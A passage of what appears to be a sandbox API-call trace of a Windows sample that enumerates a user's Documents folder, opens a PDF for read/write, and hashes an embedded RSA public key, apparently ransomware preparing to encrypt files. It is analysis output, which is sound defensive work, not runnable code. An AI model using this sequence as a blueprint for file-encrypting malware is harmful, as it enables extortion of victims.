hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0188.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0188.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0188.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0188.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0188.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0188.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0188.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0188.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0188.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0188.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.861] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0188.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0188.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.861] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.862] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.862] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.862] PathFindFileNameW (pszPath="") returned="" [0188.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.862] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b0246b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b0246b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0188.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.863] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b0246b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b0246b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.863] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe83efde0, ftCreationTime.dwHighDateTime=0x1d89d4b, ftLastAccessTime.dwLowDateTime=0x44c033a0, ftLastAccessTime.dwHighDateTime=0x1d8a2a5, ftLastWriteTime.dwLowDateTime=0x44c033a0, ftLastWriteTime.dwHighDateTime=0x1d8a2a5, nFileSizeHigh=0x0, nFileSizeLow=0x51e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3_n MMYV5XKxtc1mbc-U.pdf", cAlternateFileName="3_NMMY~1.PDF")) returned 1 [0188.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae28d8 | out: hHeap=0x2c0000) returned 1 [0188.864] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\3_n MMYV5XKxtc1mbc-U.pdf") returned=".pdf" [0188.864] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\3_n MMYV5XKxtc1mbc-U.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\3_n mmyv5xkxtc1mbc-u.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.868] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=20966) returned 1 [0188.868] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.872] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x51c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.872] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.875] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.875] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x51e6, lpOverlapped=0x0) returned 1 [0188.876] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.876] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.876] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.876] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.877] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.877] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.877] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.877] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.877] GetLastError () returned 0x0 [0188.877] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.877] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.878] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.878] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.878] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x51f0) returned 0x2ae3ea0 [0188.878] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae28d8 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2920 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.879] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0188.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0188.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da18 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0da00 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0188.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.882] GetCurrentThreadId () returned 0x5d8 [0188.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee9b0 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.883] GetCurrentThreadId () returned 0x5d8 [0188.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0188.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da18 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 